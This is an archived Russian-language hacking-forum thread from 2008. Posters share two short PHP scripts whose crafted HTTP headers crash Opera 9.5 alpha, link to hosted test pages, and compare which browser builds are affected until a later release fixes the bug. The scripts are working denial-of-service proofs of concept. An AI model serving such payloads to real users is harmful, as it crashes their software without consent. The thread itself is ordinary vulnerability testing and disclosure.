Просмотр полной версии : Opera 9.5 Alpha DoS Exploit
_kREveDKo_
12.03.2008, 14:32
Наткнулся случайно
<?php
header("HTTP/1.1 200 OK\n");
header("Content-Length: 56862\n");
header("Content-Type: application/x-zip-compressed\n");
header("Last-Modified: Mon, 04 Jun 2007 13:16:24 GMT\n");
header("Accept-Ranges: bytes\n");
header("ETag: \"408f158daaa6c71:496\"\n");
header("Date: Wed, 12 Mar 2008 10:02:34 GMT\n");
?>
Протестить:
http://b00zy.netsec.ru/dos.php
Поверил бру, что на 9.26 не пашет, тестим дальше...
8.5, 9.0, 9.25 тоже не подвержены
Проверил бы (у меня 9.50 бетка), но если кто подскажет, как удалить плагин от регета к опере..Вроде удалял, но урл все равно передается к регету и краш происходит(( мучаюсь так давно(
анинсталь софт. или попробуй то гугл HijackThis и в ней удаляй все висящие в фоне "заразы"
_kREveDKo_
14.03.2008, 00:37
цуки! у кого-нить хоть кроме меня работает? ))
_kREveDKo_
16.03.2008, 15:36
Мммм.. оказалось, что ентот баг присутствует только в ПОРТАБЛ верси этой оперы альфы...
А вот терь я поставил обычную версию 9.5 альфа и... баг не работает, но нашёл новый денай оф сервис со след. пакетом:
http://b00zy.netsec.ru/dos2.php
<?php header("HTTP/1.1 200 OK\n");
header("Content-Type: application/x-x509-ca-cert\n");
?>
На 9.26 и 8.5 не работает.. ребят, попрошу активнее, надо тестить!
blackybr
16.03.2008, 19:56
ie 7 редлагает сохранить сертификат. мозила даже на ссылку не переходит)
_kREveDKo_
16.03.2008, 20:15
да и ie 6.0 собственно так же как и 7. у оперы глюк какой-то с сертификатами
_kREveDKo_
23.03.2008, 13:26
Спущено в паблик
AHTOLLlKA
23.03.2008, 13:47
дос2 работает на:
Version 9.50 beta Build 9755
_kREveDKo_
23.03.2008, 14:15
билд Build 9500 тоже подвержен
_kREveDKo_
17.06.2008, 01:22
Свежий релиз данному косяку не подвержен.
Свежий релиз данному косяку не подвержен.
Ога, свежий релиз и без эксплойтов замечательно уходит в даун
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot